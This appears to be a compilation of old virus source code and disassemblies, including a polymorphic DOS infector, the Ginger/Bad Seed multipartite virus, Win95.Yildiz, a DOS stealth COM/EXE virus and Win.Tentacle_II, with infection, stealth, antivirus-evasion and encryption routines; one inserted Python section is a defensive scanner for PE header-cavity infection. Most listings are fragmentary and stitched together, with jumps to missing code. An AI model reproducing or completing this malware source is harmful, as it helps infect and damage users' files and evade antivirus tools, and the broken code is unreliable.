PUSH DS
JMP Exit_Infect
Init_Infect: PUSH DX
PUSH DS
PUSH CS
POP DS
JNC Blank_Attr
DB 0E9h, 7Eh, 0
; * JMP Restore_Int24h *
PUSH DX
PUSH DS
PUSH CS
POP DS
Exit_Infect: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
; Returns CF when the filename holds 'SC' or a 'V', this includes most
; anti-virus programs, SCAN, TBSCAN, VIRSCAN, CPAV, NAV, IBMAV, etc.
Check_File_Name:
PUSH DS
POP ES
MOV DI, DX
MOV SI, CX
LOOP Find_SCan
RETN
RETN
; Trash signature.
Not_Protected: CLC
RETN
Add_Virus:
CALL Seek_EOF
JMP Exit_Add_Virus
CALL Seek_EOF
ADD AX, Virus_Size ; Calculate size after
ADC DX, 0 ; infection.
MOV Header.File_512_Pages, AX
MOV Header.Image_Mod_512, DX
CALL Seek_BOF
Exit_Add_Virus: RETN
; The decryptors being generated are quite simple; they are effective enough
; against pure signature scanners, though they can be found with a simple
; algorithmic approach. A peculiarity is that the decryptors use themselves
; as a key, which drastically complicates debugging.
Poly_Engine:
PUSH BP
MOV AX, DX
MOV BP, DX ; BP is used as a pointer to
; random data.
PUSH DS
POP ES
INC SI
POP BP
RETN
Make_Load_DS:
DEC BP ; Adjust random pointer.
; *** Not needed as this is
; the first reference to it.
CALL Add_Junk
RETN
CALL Add_Junk
RETN
Make_Load_Ptr:
AND CH, 11111110b ; BX is start code.
; *** CX is already zero.
DEC BP
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
RETN
Make_Decr_Loop:
MOV AH, 14h ; DL, [SI]
MOV DH, 17h ; DL, [BX]
CALL Add_Junk
DEC BP
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
MOV AX, DI
CALL Add_Junk
RETN
Add_Junk:
DEC BP
DEC BP
MOV AL, ES:[BP]
TEST AL, 00000010b
JZ Junk_CMP
JMP Exit_Add_Junk
JMP Exit_Add_Junk
Make_Operand: DEC BP
MOV AH, ES:[BP]
JMP Exit_Add_Junk
Junk_CMP: DEC BP
Exit_Add_Junk: RETN
Append_Body_Encrypted:
CALL Crypt_Virus
PUSHF
CALL DWORD PTR Old_Int21h
JC Crypt_Loop
SUB AX, CX
Crypt_Loop: PUSHF
POPF
RETN
Crypt_Virus:
MOV BX, 0
MOV SI, OFFSET Decryptor
MOV CX, OFFSET Decryptor
INC SI
INC BX
RETN
Decryptor:
PUSH CS
TEST CL, BL
MOV BX, 0
TEST SP, AX
CLD
TEST CH, BL
TEST AX, CX
Decrypt_Byte: MOV DL, [SI] ; Get the key from the
; decryptor.
DB 039h, 0D8h
; * CMP AX, BX *
NOP
NOP
Decrypt_Loop: NOP
CLD
Old_Int13h DW 0, 0
End_Body:
Buffer:
File_Handle DW 0
Old_SP DW 0
Old_SS DW 0
Old_Attr DW 0
Old_File_Date DW 0
Old_File_Time DW 0
Old_Int1Ch DW 0, 0
Old_Int21h DW 0, 0
Old_Int24h DW 0, 0
Int_Count DW 0
New_Int13h_Copy:
DB (New_Int1Ch-New_Int13h) DUP(0)
Append_Body_Encrypted_Copy:
DB (Decryptor-Append_Body_Encrypted) DUP(0)
Header DW 14 DUP(0)
Validate_Header DW 4 DUP(0)
ORG Buffer+512
End_Heap:
Carrier:
MOV AX, 4C00h
INT 21h
EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS
Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS
Find_FN_Dir STRUC
Dir_Reserved DB 21 DUP(0)
Dir_Attr DB 0
Dir_Time DW 0
Dir_Date DW 0
Dir_Size DW 0, 0
Dir_Name DB 13 DUP(0)
Find_FN_Dir ENDS
END Init_Virus
; Bad Seed (Ginger.2782) disasm.
; Multipartite full-stealth MBS/COM/EXE.
; Quite a good virus for its time (1992), yet the coding style could be
; made more compact, and it's buggy as well.
; Bugs marked with '***'.
; T-2000/IR, February 2000 - September 2000.
.MODEL TINY
.CODE
START:
CALL File_Entry
EXE_Data:
EXE_SP DW 0
EXE_SS DW 0
EXE_IP DW 0
EXE_CS DW 0
File_Entry:
XCHG BP, AX ; Save AX (FCB-status) in BP.
PUSH CS
POP DS
CLD
XOR DI, DI
Find_ComSpec: PUSH SI
PUSHF
POPF
JE Save_ComSpec ; Yeah got it..
POP SI
PUSH CS
POP DS
MOV [SI+(ComSpec_Length-Boot_Loader)], CL
PUSH SI
POP SI
Hook_Ints: CLI
MOV AX, CS
XCHG DS:[(08h*4)+2], AX
STOSW
MOV AX, ES
XCHG DS:[(21h*4)+2], AX
STOSW
XCHG BX, AX
STOSW
MOV AX, CS
XCHG DS:[(01h*4)+2], AX
STOSW
STI
Save_Int13h: PUSH DS
LDS BX, DS:[(13h*4)] ; Get (tunneled) INT 13h.
MOV AX, DS
STOSW
POP DS
POP ES
Pick_i13h_ISR: POP DS
PUSH SI
PUSHF
; Stealth ISR.
JNE Hook_Int13h
; Stealth/infection ISR.
POPF
POP SI
PUSH CS
POP DS
PUSH ES
PUSH CS
POP ES
MOV AX, 0201h ; Read the MBS of HDD 1.
LEA BX, CS:[SI+(Buffer-Boot_Loader)]
MOV CX, 1
MOV DX, 80h
INT 03h
POP ES
Find_Act_Part: TEST BYTE PTR [BX+DI], 80h ; It's the active partition?
JNZ Chk_Partition
POP ES
Run_Old_Boot:
XOR CX, CX ; Zero ES.
MOV ES, CX
ADD CS:[SI+(EXE_CS-Boot_Loader)], DX
ADD DX, CS:[SI+(EXE_SS-Boot_Loader)]
MOV SS, DX
MOV SP, CS:[SI+(EXE_SP-Boot_Loader)]
MOV ES:[600h+(Act_Partition-File_Int21h)], DI
MOV DS:[SI+(Act_Partition-Boot_Loader)], DI
MOV [SI+(Original_Word-Boot_Loader)], AX
PUSH CS
POP ES
PUSH SI
CLD
CLI
Restore_Int03h: POP SI
PUSH SI
PUSH CS
POP DS
STI
POP SI
JMP Run_Host
POPF
New_Int01h: CLI
PUSH DS
PUSH ES
PUSH DI
CALL Get_Delta_1
Old_Int03h DW 0, 0
PUSH CS
POP ES
CLD
XCHG BX, AX
XCHG DS:[(03h*4)+2], AX
STOSW
PUSH DS ; ES = IVT.
POP ES
PUSH SI
POP SI
POP DI
POP ES
POP DS
IRET
ComSpec_String DB 'COMSPEC='
ComSpec_Value DB 13 DUP (0)
ComSpec_Length DW 0
New_Int08h:
PUSH DS
PUSH AX
PUSH ES
PUSH SI
PUSH DI
PUSH CS
POP ES
MOV AX, CS
MOV DI, OFFSET Old_Int21h+2
NOP
STI
POP DI
POP SI
POP ES
Exit_Int08h: POP AX
POP DS
Boot_Int21h:
PUSH DS
PUSH AX
Exit_No_Debug: POP AX
POP DS
PUSH ES
PUSH AX
PUSH BX
MOV ES, BX
PUSH AX
POP AX
Exit_FCB_St: POP BX
POP AX
POP ES
IRET_FCB_St: IRET
PUSH BX
PUSH DX
Save_Handle: PUSH BX
PUSH ES
PUSH AX
PUSH CX
PUSH SI
PUSH DI
PUSH DS
POP ES
STD
MOV SI, DI
JNE Do_Open_Create
Do_Open_Create: POP DI
POP SI
POP CX
POP AX
POP ES
POP BX
POP DX
PUSH AX
PUSH CX
PUSH DX
POP DX
POP CX
XCHG BX, AX
JNE Save_Inf_Hand
JMP JMP_Old_Int21h
Get_End_DX:
MOV DI, DX
RETN
Do_Infect:
PUSH ES
PUSH BX
PUSH CX
PUSH SI
PUSH DI
PUSH DS
PUSH DX
PUSH DS
POP ES
PUSH AX
CALL Get_End_DX
PUSH CS
POP DS
PUSH DI
XCHG SI, DI
XCHG SI, DI
LOOP Comp_ComSpec
XCHG BX, AX
LOOP Get_Extension
RETN
Exit_Check_Ext: RETN
POP AX ; AX on entry.
PUSH AX
POPF
JE Find_File_Name
JMP Exit_Infect
DB 'CHKDSK', 0
Windows_Active = BYTE PTR $-1
DB 'MEM'
Mem_String = $-1
Go_Chk_Win_Act: POPF
JNE Check_Windows
XCHG SI, DI
LOOP Chk_Start_Name
JNE Chk_File_Name
MOV DX, SI
XCHG SI, DI
XCHG SI, DI
LOOP Compare_Byte
PUSH CS
POP ES
CLD
CLI
MOV AX, CS
XCHG DS:[(12h*4)+2], AX
STOSW
STI
JMP SHORT Check_Windows
CLI
STI
PUSH DS
POP BP
PUSH DS
PUSH DX
POP DX
POP CX
Restore_Int24h: POP DS
POP BX
POP AX
RETN
Infect_Handle:
PUSH CS
POP DS
PUSH DS ; ES = CS.
POP ES
MOV [SI+(EXE_SP-EXE_Data)], ES
MOV [SI+(EXE_SS-EXE_Data)], AX
MOV [SI+(EXE_IP-EXE_Data)], AX
MOV [SI+(EXE_CS-EXE_Data)], ES
MOV [DI+(Host_Size-Buffer)], AX
MOV [DI+(Host_Size-Buffer)+2], DX
Exit_Inf_Hand: RETN
Check_Header: PUSH DI
MOV CX, 9
XOR DX, DX
MOV CX, 4
PUSH DI
MOV SI, [DI.Header_Size]
XOR DI, DI
POP DI
MOV [DI.Program_IP], AX
MOV [DI.Program_CS], DX
MOV [DI.Program_SP], AX
MOV [DI.Program_SS], DX
MOV [DI.Image_Mod_512], AX
POP AX
ADD [DI.File_512_Pages], AX
MOV DX, OFFSET Buffer
NOP
MOV CX, 24 ; Write 24 bytes (MZ-header).
JMP SHORT Write_Header
PUSH DS
POP ES
Bad_Exit: STC
Good_Exit: RETN
PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
Exit_Infect_3E: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES
POP DS
JMP IRET_Flags
Go_Check_Secs:
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
CALL Check_60_Secs
Exit_Go_Chk_Se: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES
JE Stealth_Handle
JMP JMP_Old_Int21h
Check_60_Secs:
MOV AL, CL
XOR AL, CL
RETN
Stealth_Handle:
PUSH DS
PUSH DX
PUSH CX
PUSH AX
PUSH CS
POP DS
XOR CX, CX
MOV New_Read_Count, CX
POP AX
POP DS
PUSH CX
POP CX
JMP IRET_Flags
Rest_File_Pos: PUSH AX
POP BP
PUSH CS
POP DS
PUSH AX
PUSH CX
POP CX
POP AX
POP CX
POP CX
MOV AX, CX ; AX = 0.
JZ Exit_Stealth_1
Error_St_Exit: POP DX
POP DX
Exit_Stealth_1: POP DX
POP DS
JMP IRET_Flags
POP AX
POP CX
MOV CX, -1
SUB CX, New_Read_Count
Do_Function: POP AX
POP CX
POP DX
POP DS
PUSH CX
PUSH AX
PUSH DX
POP DX
POP CX
PUSH AX
PUSH DX
INC AL ; AX = 5701h.
OR CL, (62/2) ; Set 60 seconds.
DEC CX
CALL Do_Old_Int21h
POP DX
POP AX
Exit_Stealth_2: POP CX
JMP IRET_Flags
Clean_Handle:
MOV WORD PTR Valid_Handle, 0001h
MOV File_Handle, BL
POP AX
POP CX
POP DX
POP DS
Check_Win_Exit:
POP BX ; Remove return IP off stack.
POP CX ; POP program's return CS.
PUSH CX
PUSH BX
PUSH AX
POP AX
Stealth_Seconds:
PUSH AX
PUSH CX
PUSH DX
PUSH AX
PUSH CX
POP CX
POP AX
POP DX
POP CX
POP AX
RETN
; This ISR stealths the first INT 12h call and then unhooks itself; this way
; MEM and CHKDSK will report the untouched total DOS memory size.
New_Int12h:
PUSH DS
PUSH ES
PUSH BX
POP BX
POP ES
POP DS
IRET
DB '10/23/92', 0
Origin = BYTE PTR $-1
File_Int21h:
CMP AX, 0EEE7h ; Residency check?
JE Return_ID_2
Act_Partition DW 0
Boot_Int13h:
CMP DX, 80h ; 1st HD - head zero?
JNE JMP_Boot_i13h
PUSH SI
Do_Read_Write: PUSH AX
POP AX
CALL Get_Act_Partition
CMP AL, 1
JE Success_IRET
PUSH AX
PUSH CX
PUSH DX
PUSH DI
XOR AH, AH
CMP CX, 1
MOV CX, 512
JNE Calc_Sec_Size
OR DX, DX
JZ Clear_Buffer
MOV CX, 0
CLD
Clear_Byte: STOSB
LOOP Clear_Byte
POP DI
POP DX
POP CX
POP AX
IRET_Flags: PUSH AX
LAHF
PUSH BP
MOV BP, SP
POP BP
POP AX
IRET
CALL Get_Delta_2
Get_Delta_2: POP SI
SUB SI, OFFSET Get_Delta_2
RETN
End_Body:
EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS
Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS
END START
; *************************************************************************
; ********************                                 ********************
; ********************          Win95.Yildiz           ********************
; ********************               by                ********************
; ********************           Black Jack            ********************
; ********************                                 ********************
; *************************************************************************
;
;
;NAME: Win95.Yildiz
;AUTHOR: Black Jack [independent Austrian Win32asm virus coder]
;CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
;TYPE: Win9x direct acting/global ring3 resident PE header cavity virus
;SIZE: 323 bytes (but of course infected files won't increase in size)
;
;DESCRIPTION: When an infected file is run, the virus takes control. It then
; tries to find the kernel32 base address by a simple algorithm
; which should make it compatible with Win9X and WinME (although I
; haven't tested it with the second one). After that it gets the
; undocumented Win9X API VxDCall0 and uses it to call int 21h. The
; VxDCall0 API is the very first exported API in Win9X; I don't
; know which API is first in WinNT, that's why unpredictable
; results may occur when the virus runs in that OS (I haven't tried
; it out, but of course the virus can't work in NT).
; Then it goes TSR (read more about this a bit later), and infects
; all PE EXE files in the current directory by overwriting the
; unused padding bytes in the PE header with the virus body.
; The memory residency consists of infecting kernel32.dll in memory.
; To do so, it creates a temporary file called "Yildiz." and writes
; the first 4KB of kernel32.dll there. Then this file is infected
; like any other PE file. And finally the content of the infected
; temp file is read back into kernel32 memory. Yep, you have read
; right, by using the int21h with VxDCall0 you can read from a file
; into read-only memory! (This trick was discovered by Murkry/IkX,
; read more about it in the comments to his Darkside virus source,
; published in Xine#3).
; As I have already said, the kernel32 is infected in memory just
; like any other file, this means the entry point is set to the
; virus, no APIs are hooked. As you should know, the entry point
; of a DLL is an init routine that is called whenever the DLL is
; loaded by a program. And since kernel32 is imported by all
; programs, this means for us that whenever a program is run (and
; kernel32 is mapped into the program's address space), our virus
; will infect all PE EXE files in the directory of the program.
;
;ASSEMBLE WITH:
; tasm32 /mx /m yildiz.asm
; tlink32 /Tpe /aa yildiz.obj,,, import32.lib
;
; there's no need for PEWRSEC or a similar tool, because the
; virus code is supposed to run in read-only memory anyways.
;
;DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
; Therefore, this source was only written for research and
; education. Please do not spread it. The author can't be held
; responsible for what you decide to do with this source.
; ===========================================================================
.code
virus_start:
pushad ; save all registers
search_kernel32:
xor ax,ax ; we assume the least significant
; word of the kernel32 base is zero
cmp word ptr [eax], "ZM" ; is there a MZ header ?
JE found_kernel32 ; if yes, we found the correct
; kernel32 base address
dec eax ; 0BFF80000->0BFF7FFFF, and then the
; least significant word is zeroed
JMP search_kernel32 ; check next possible kernel32 base
tmp_filename db "Yildiz", 0
filespec db "*.EXE", 0
found_kernel32:
mov ebx, [eax+3Ch] ; EBX=kernel32 PE header RVA
add ebx, eax ; EBX=offset of kernel32 PE header
findfile_loop:
call ebp ; call our int 21h procedure
JC all_done ; no more files found?
mov ax, 3D02h ; open victim file for read and write
lea edx, [esi.dta+1Eh] ; DS:EDX=pointer to filename in DTA
call ebp ; call our int 21h procedure
search_on:
mov ah, 4Fh ; find next file
JMP findfile_loop
all_done:
pop edx ; restore old DTA offset in DS:EDX
pop ds
mov ah, 1Ah ; reset DTA to old address
call ebp ; call our int 21h procedure
push es ; DS=ES (standard data segment)
pop ds
add esp, size stack_frame ; remove our data buffer from stack
exit_infect:
pop edi ; restore EDI (delta offset)
RET ; return to caller
infect:
push edi ; save EDI (delta offset)
write_file:
mov ah, 40h ; write to file
read_write:
xor ecx, ecx ; ECX=0
pushad ; save all registers
virus_end:
stack_frame struc
buffer db 4096 dup(?)
dta db 43 dup(?)
VxDCall0 dd ?
stack_frame ends
host:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
end virus_start
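The header-cavity technique described in the Yildiz header above (the virus body replaces the padding between the end of the PE section table and the first section's raw data, so the file size does not change) has a direct defensive counterpart: check whether that padding still consists of zero bytes. The following Python is an added example written for this zine entry from the analyst's side; it is not Black Jack's code and not part of the original listing. It constructs its own minimal PE32 image in memory (the sample bytes are constructed, not a real executable) and assumes only the standard PE header layout; the bound-import directory, which a linker may legitimately place in that gap, is excluded from the check.

```python
import struct

SECTION_HEADER_SIZE = 40
COFF_HEADER_SIZE = 20
PE32_MAGIC = 0x10B
BOUND_IMPORT_INDEX = 11   # data directory slot that may legitimately sit in header slack


def build_sample_pe(cavity_payload: bytes = b"") -> bytes:
    """Constructed minimal PE32 image (not a real binary): one .text section at
    file offset 0x200 and 160 bytes of header slack in front of it. Whatever is
    passed as cavity_payload is written into that slack, which is where a header
    cavity infector would put its body (the bytes used here are dummies)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE signature at 0x40
    # COFF header: i386, 1 section, 0xE0-byte PE32 optional header, EXE flags
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x10F)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)            # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)            # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)             # FileAlignment
    struct.pack_into("<I", opt, 60, 0x200)             # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes (all empty)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x10, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section
    slack = 0x200 - len(headers)                       # 160 bytes of padding
    if len(cavity_payload) > slack:
        raise ValueError("payload does not fit the header slack")
    padding = cavity_payload + b"\0" * (slack - len(cavity_payload))
    return headers + padding + b"\xC3" * 0x200         # section body: dummy bytes


def header_slack(pe: bytes):
    """Locate the gap between the end of the section table and the first
    section's raw data. Returns (start, end, (bound_import_off, bound_import_size))."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + COFF_HEADER_SIZE
    sect_table = opt + size_opt
    end_of_tables = sect_table + SECTION_HEADER_SIZE * num_sections
    raw_starts = []
    for i in range(num_sections):
        size_raw, ptr_raw = struct.unpack_from(
            "<II", pe, sect_table + SECTION_HEADER_SIZE * i + 16)
        if size_raw:                                    # skip bss-only sections
            raw_starts.append(ptr_raw)
    first_raw = min(raw_starts) if raw_starts else end_of_tables
    first_raw = min(first_raw, len(pe))                # tolerate truncated files
    # The bound import table is the one structure a linker legitimately places
    # in this gap; its address field is a file offset inside the headers.
    magic = struct.unpack_from("<H", pe, opt)[0]
    is_pe32 = magic == PE32_MAGIC
    num_dirs = struct.unpack_from("<I", pe, opt + (92 if is_pe32 else 108))[0]
    bound = (0, 0)
    if num_dirs > BOUND_IMPORT_INDEX:
        dd_base = opt + (96 if is_pe32 else 112)
        bound = struct.unpack_from("<II", pe, dd_base + 8 * BOUND_IMPORT_INDEX)
    return end_of_tables, first_raw, bound


def scan_header_cavity(pe: bytes) -> dict:
    """Count non-zero bytes in the header slack outside the bound import table.
    Any such byte means something was written where only padding belongs."""
    start, end, (bound_off, bound_size) = header_slack(pe)
    nonzero = 0
    for off in range(start, end):
        if bound_off <= off < bound_off + bound_size:
            continue
        if pe[off] != 0:
            nonzero += 1
    return {
        "slack_start": start,
        "slack_end": end,
        "slack_size": end - start,
        "nonzero_bytes": nonzero,
        "suspicious": nonzero > 0,
    }


if __name__ == "__main__":
    # Constructed samples: a clean image and one whose padding holds dummy code bytes.
    for label, payload in (("clean", b""), ("cavity", b"\x60" + b"\x90" * 50)):
        print(label, scan_header_cavity(build_sample_pe(payload)))
```

A clean image reports 160 bytes of slack and no non-zero bytes; the second sample is flagged because its padding carries content. On real files, treat a hit as a trigger for closer inspection rather than proof: a few toolchains write version strings or other small markers into the header, so the count and the location of the non-zero run are worth reporting alongside the verdict.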
comment \
Description:
When an infected file is executed, the virus gains control and goes TSR by
the standard MCB method and hooks int21h. It then infects COM and EXE files
when they are executed or loaded by function 4Bh. The infection process is
100% standard. Date, Time and Attributes are stored (except that the seconds
field holds the infection mark 60), and a dummy int24h is installed during
infection. Also, the virus uses size stealth for FCB (functions 11h, 12h),
handle (functions 4Eh, 4Fh) and Win95 (functions 714Eh, 714Fh), although
the handle stealth won't work because of lots of bugs. Also it has a kind
of time-stealth, on the get time function (5700h) it returns the seconds
field of the last infected file to hide its infection mark.
Comments:
This is just a stupid and boring DOS virus; I just disassembled it because
of great boredom and because I had found an infected file on my mother's PC
(but please don't ask me how it came there). It's full of bugs and rubbish.
TASM /M cu
TLINK /t cu
.model tiny
.286
.code
org 100h
start:
nop ; dummy host
nop
nop
v_start:
push es ; save PSP segment
push cs ; DS=CS
pop ds
xor di,di ; DI=0
lea si,[bp+v_start] ; SI=start of virus code
mov cx,virus_size ; CX=size of virus
cld ; clear direction flag
rep movsb ; copy virus to TSR location
already_resident:
pop es ; ES=PSP segment
push cs ; DS=CS
pop ds
restore_com:
lea si,[bp+header] ; original first bytes of host
mov di,100h
cld ; clear direction flag
movsw ; move start of host back
movsb
restore_exe:
mov ax,es ; AX=ES=PSP segment
add ax,10h ; AX=start segment of image
push es ; DS=ES=PSP segment
pop ds
add word ptr cs:[bp+host_cs],ax ; relocate jump to host
add ax,word ptr cs:[bp+host_ss] ; relocate host SS
mov ss,ax ; restore host SS
mov sp,word ptr cs:[bp+host_sp] ; restore host SP
host_ss dw ?
host_sp dw ?
int21h_handler:
cmp ax,1818h ; residency check
jne no_residency_check
mov bx,0C001h ; we're already installed
iret ; quit interrupt execution
no_residency_check:
cmp ah,4Bh ; load/execute file
jne no_exec
jmp infect
no_exec:
cmp ah,11h ; FCB find first file?
je fcb_stealth
cmp ah,12h ; FCB find next file?
je fcb_stealth
no_LFN_stealth:
cmp ax,5700h ; get file date/time?
jne org_int21h ; Jump if not equal
jmp time_stealth
org_int21h:
db 0EAh
int21h_pointer equ this dword
int21h_offset dw ?
int21h_segment dw ?
push es ; DS:BX=DTA
pop ds
cwd ; DX=0
exit_fcb_stealth:
pop es ; restore segment registers
pop ds
popa ; restore all regs
popf ; restore flags
retf 2 ; return from INT and keep the flags
handle_stealth:
pushf ; push flags
call dword ptr cs:[int21h_pointer-v_start]
jc findfirstnext_failed
pushf ; save flags
pusha ; save all registers
push ds ; save segment registers
push es
push di ; save DI (useless)
handle_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine
cmp cl,"E" ; really an EXE?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine
do_handle_stealth:
sub word ptr es:[bx+1Ah],virus_size ; fixup filesize
; BUG! hiword of filesize unchanged!!!
exit_handle_stealth:
pop di ; restore DI
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
findfirstnext_failed:
retf 2 ; return from INT and keep the flags
dos_datetime_format:
mov cx,es:[di+14h] ; get filetime in CX
filetime_in_CX:
and cl,00011111b ; CL=file seconds
cmp cl,1Dh ; seconds=60 means infected
jne exit_lfn_stealth ; if not, exit stealth routine
nop
nop
lfn_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_lfn_stealth ; if not, leave stealth routine.
nop
nop
cmp cl,"E" ; is it really an EXE?
jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nop
nop
do_lfn_stealth:
sub word ptr es:[di+20h],virus_size ; fixup filesize
sbb word ptr es:[di+22h],0
exit_lfn_stealth:
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
retf 2 ; return from INT and keep the flags
; ----- GET THE FILE EXTENSION ----------------------------------------------
get_extension:
lodsb ; get a char from filename
cmp al,"." ; end of filename?
jne get_extension ; if not, search on
get_attributes_ok:
mov ax,3D02h ; open file r/w
int 21h ; DS:DX=filename ptr
jnc openfile_ok
jmp reset_attributes
openfile_ok:
xchg bx,ax ; filehandle to BX
push cs ; DS=ES=CS
push cs
pop ds
pop es
infect_com:
mov ax,4202h ; goto end of file
xor cx,cx ; CX:DX=0=distance to move
cwd
int 21h
new_jmp:
db 0E9h
jmp_distance dw ?
infect_exe:
cmp word ptr cs:[header-v_start+18h],40h ; Relo table address
jb no_new_exe
jmp restore_filetime ; don't take New EXEs
no_new_exe:
cmp word ptr cs:[header-v_start+1Ah],0 ; Overlay number
je no_overlay
jmp restore_filetime ; don't take overlays
no_overlay:
cmp word ptr cs:[header-v_start+12h],"UC" ; CRC/infection mark
jne not_infected_yet
jmp restore_filetime ; don't reinfect
not_infected_yet:
mov word ptr cs:[host_type-v_start],"XE" ; mark host as EXE
int24h_handler:
iret ; Interrupt return
int24h_offset dw ?
int24h_segment dw ?
restore_filetime:
pop dx ; restore old file date in DX
pop cx ; restore old file time in CX
set_filetime:
mov ax,5701h ; set file time/date
int 21h
reset_attributes:
pop cx ; restore old file attributes
pop ds ; restore pointer to filename
pop dx ; in DS:DX
mov ax,4301h ; set file attributes funct.
int 21h
end start
comment %
Name : Win.Tentacle_II
Alias : Shell
Author : ?
Type : direct acting Win16 NE appender
Size : 10608 bytes virus body (because of relocation stuff
infected files grow by at least 10634 bytes)
Origin : ?
When : 1996
Status : was in the wild (distributed in sex newsgroups in 1996)
Disassembled by : Black Jack
Contact me : Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
Description:
When the virus gets activated, it starts to search and infect NE EXE files,
first one *.EXE file in the current directory, then two in the C:\WINDOWS
directory, then one in some other possible hardcoded windows directories
(C:\WIN, C:\WIN31, C:\WIN311, C:\WIN95), and then one *.SCR file in the
current dir. While infecting, the virus creates a temporary file
C:\TENTACLE.$$$ and rebuilds there an infected image of the victim file. When
the infection process is finished this file is copied back over the victim
file and then deleted.
The infection technique is adding another segment with the virus
code at the end of the file. To add its own entry to the segment table, it
checks if there is enough unused room between the end of the NE header tables
and the start of the first segment and aborts infection if not. Then it
shifts back all tables after the segment table (therefore overwriting the
unused fill bytes) and fixes their offsets in the NE header, so that it can
write its own segment descriptor at the end of the segment table. In a similar
way it adds its own entries to the module-reference and the imported-names
table (this is necessary to import two APIs that are used in the payload).
The most interesting feature of the virus is that it was one of the first (if
not the very first) viruses using EPO techniques, that means infecting the
file without modifying its entry point. To do so, it searches the code segment
that contains the entry point for a call to the INITTASK API from KERNEL.DLL,
or, if that one is not found, the THUNRTMAIN API from VBRUN300.DLL; these are
APIs that should be in the very beginning of a program. Then the relocation
item that is associated with the API call is patched in such a way that this
call is redirected to the virus.
While infecting, the virus pays special attention to the WINHELP.EXE files.
This file contains a self-check in Win3.11. And that's why the virus patches
it in a special way, so that this self-check is disabled.
The payload is activated if the virus is run between 1:00am and 1:05am - The
virus drops a file C:\TENTACLE.GIF containing a picture of the violet tentacle
from the classical computer game "the day of the tentacle" and modifies the
registry in such a way that whenever the program associated with .GIF files
is run to view such a file it displays the file dropped by the virus. To do so
it uses two imported APIs RegSetValue and RegQueryValue from SHELL.DLL.
Additionally, if the virus is executed between 1:15am and 2:00am it runs the
opposite effect and undoes the changes in the registry that were done in the
payload.
TASM /M tenta2
TLINK tenta2
The first generation sample is a DOS EXE file and infects all suitable EXE files
in the current directory only.
%
virus_size EQU (offset virus_end - offset virus_start)
.model tiny
.code
.386
org 0
virus_start:
segm_offset dw 0
segm_phys_size dw virus_size
segm_attribs dw 0001110101010000b ; readable code segment with relocs
segm_virt_size dw virus_size
reloc_stuff:
dd 0000FFFFh ; pointers that will become relocated
dd 0000FFFFh ; must be initialised by 0000:FFFF
dd 0000FFFFh
virus_entry:
push ds ; save DS
pusha ; save all registers
push ss ; DS=SS
pop ds
mov bx,1
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in current dir
mov bx,2
mov cx,offset C_windows
mov dx,offset exe_wildcard
CALL infect_directory ; infect two EXE files in C:\WINDOWS
mov bx,1
mov cx,offset C_win
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN
mov bx,1
mov cx,offset C_win31
